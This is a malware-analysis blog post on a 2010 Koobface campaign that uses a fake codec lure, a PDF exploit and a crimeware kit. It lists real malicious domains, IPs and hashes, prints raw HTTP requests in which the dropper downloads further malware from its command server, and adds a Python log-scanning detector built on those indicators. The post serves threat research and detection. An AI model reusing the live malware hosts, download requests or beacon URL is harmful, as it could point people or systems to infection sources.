MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely related to the field of intelligence.

25.7.10

Koobface circuit from 91.188.59.10 (BKCNET "SIA" IZZI)

After several months without news of Koobface, at least as far as its usual propagation method goes (the classic fake YouTube screen used as a lure), it is back with another propagation campaign.

This time its spread again relies on visual social engineering, but instead of the usual YouTube video template it uses a page with pornographic content.


As the screenshot shows, when the victim tries to play any of the supposed videos, a small window warns that a codec must be downloaded. Accepting downloads Koobface disguised as a binary called codec.exe (5910e59d592781cec3234abf57f8d000) from the IP address 91.188.59.10, to which the domain 1zabslwvn538n4i5tcjl.com resolves. This IP has been used to propagate Koobface since March 2010.

In addition, the page contains an embedded script that redirects traffic to download a PDF file carrying an exploit for CVE-2008-2992 (the Adobe Reader util.printf vulnerability).


The same IP also shows that its administration is carried out through a known crimeware kit: YES Exploit System.


The binary codec.exe is packed with UPX (identified as "UPX 0.89.6 - 1.02/1.05-1.22 -> Markus&Laszlo"). When executed it generates a BAT file (which deletes itself afterwards) containing the instructions for reaching the C&C; it connects to 1zabslwvn538n4i5tcjl.com, from which it downloads the following malicious code:
  • wsc.exe (80427b754b11de653758dd5e1ba3de1c) Koobface
  • dm.exe (b658d9b812454e99b2915ab2e9594b94) TDSS

GET /dm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

GET /wsc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 1zabslwvn538n4i5tcjl.com
Connection: Keep-Alive

The BAT also contains the following connection, used to report to the C&C:

http://urodinam.net/33t.php?stime=1280078675

This domain resolves to the same IP address, 91.188.59.10, and serves instructions to download further malware:
  • pi.exe (08f214c0bd61faba2f8ed89cb8f40bc0) FakeAV

This is a rogue antivirus that imitates Security Essentials 2010. It connects to getexepizdec.com (91.188.59.211), from which it downloads the file firewall.dll (a0160e8ede623b1df7d677b8d52fdc48), and to getmsdfgee54.com (88.80.4.19), from which it downloads exe.exe (5839ca78aab96724aa646789ebc24305, Olmarik) with a very low detection rate.
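The hosts, IPs, hashes and the /33t.php?stime= beacon described above are enough to hunt for this circuit in web proxy logs. The following script is an added example and is not code from the original post or from MalwareIntelligence: the indicator values are copied from the post, while the tab-separated log format, the field names and the sample log lines are constructed assumptions for the example. It also decodes the stime parameter of the beacon, which carries the Unix time at which the dropper ran (the value quoted above falls on the day this post was published).

```python
"""Added example (not from the original post): match the Koobface circuit's
indicators against HTTP proxy log lines and decode the /33t.php beacon time.

Assumed (constructed) log format, one request per line, tab separated:
    client_ip  dest_ip  method  url  user_agent  md5_of_response_body_or_dash
"""
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the post
IOC_HOSTS = {
    "1zabslwvn538n4i5tcjl.com",  # codec.exe, wsc.exe, dm.exe
    "urodinam.net",              # BAT beacon, pi.exe
    "getexepizdec.com",          # firewall.dll
    "getmsdfgee54.com",          # exe.exe (Olmarik)
}
IOC_IPS = {"91.188.59.10", "91.188.59.211", "88.80.4.19"}
IOC_MD5 = {
    "5910e59d592781cec3234abf57f8d000": "codec.exe (Koobface dropper)",
    "80427b754b11de653758dd5e1ba3de1c": "wsc.exe (Koobface)",
    "b658d9b812454e99b2915ab2e9594b94": "dm.exe (TDSS)",
    "08f214c0bd61faba2f8ed89cb8f40bc0": "pi.exe (FakeAV)",
    "a0160e8ede623b1df7d677b8d52fdc48": "firewall.dll",
    "5839ca78aab96724aa646789ebc24305": "exe.exe (Olmarik)",
}
BEACON_PATH = "/33t.php"  # beacon seen in the dropped BAT: /33t.php?stime=<unix time>
# User-Agent the dropper used for its GET requests (from the captured headers)
DROPPER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

LOG_FIELDS = ("client", "dest_ip", "method", "url", "ua", "md5")  # assumed format


def parse_line(line):
    """Split one assumed-format log line into a dict, or None if malformed."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != len(LOG_FIELDS):
        return None
    return dict(zip(LOG_FIELDS, parts))


def beacon_time(url):
    """Return the stime of a /33t.php beacon as an aware UTC datetime, else None."""
    u = urlsplit(url)
    if u.path != BEACON_PATH:
        return None
    stime = parse_qs(u.query).get("stime", [None])[0]
    if stime is None or not stime.isdigit():
        return None
    return datetime.fromtimestamp(int(stime), tz=timezone.utc)


def match(entry):
    """Return the list of reasons a parsed log entry matches the circuit's indicators."""
    reasons = []
    u = urlsplit(entry["url"])
    host = (u.hostname or "").lower()
    if host in IOC_HOSTS:
        reasons.append(f"host {host}")
    if entry["dest_ip"] in IOC_IPS:
        reasons.append(f"ip {entry['dest_ip']}")
    if entry["md5"].lower() in IOC_MD5:
        reasons.append(f"md5 {IOC_MD5[entry['md5'].lower()]}")
    t = beacon_time(entry["url"])
    if t is not None:
        reasons.append(f"beacon stime={t.isoformat()}")
    # Weak on its own, useful in combination: the dropper's IE6 UA fetching a bare .exe
    if entry["ua"] == DROPPER_UA and u.path.lower().endswith(".exe"):
        reasons.append("dropper UA fetching .exe")
    return reasons


def scan(lines):
    """Return [(url, reasons)] for every log line that matches at least one indicator."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = match(entry)
        if reasons:
            hits.append((entry["url"], reasons))
    return hits


# Constructed sample log lines for the example (not captured traffic)
SAMPLE_LOG = [
    "10.0.0.5\t91.188.59.10\tGET\thttp://1zabslwvn538n4i5tcjl.com/wsc.exe\t"
    + DROPPER_UA + "\t80427b754b11de653758dd5e1ba3de1c",
    "10.0.0.5\t91.188.59.10\tGET\thttp://urodinam.net/33t.php?stime=1280078675\t"
    + DROPPER_UA + "\t-",
    "10.0.0.7\t93.184.216.34\tGET\thttp://example.com/index.html\tMozilla/5.0\t-",
]

if __name__ == "__main__":
    for url, reasons in scan(SAMPLE_LOG):
        print(url, "->", "; ".join(reasons))
```

Matching on the destination IP as well as the host name matters here because the post shows several domains parked on 91.188.59.10; a new domain pointed at the same address would still be caught. The User-Agent rule is deliberately kept as a weak signal, since the string is a legitimate IE6 UA that real clients send.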

In short, the circuit that Koobface runs from BKCNET "SIA" IZZI involves different actors of the criminal scene, interrelated and sharing the same goal: money (feeding the underground economy), leaving behind a real portfolio of malware.

Everything behind 91.188.59.10 is managed through a known crimeware kit that sells on the underground market for around $1000, whose job is to direct the download of further malware onto the victim's computer, coordinated by affiliates who increase their profits with each successful installation of the rogue.

Related information
Symbiosis malware present. Koobface
Koobface campaign spread through Blogspot
YES Exploit System and Crimeware-as-a-Service
YES Exploit System. Official Business Partner’s
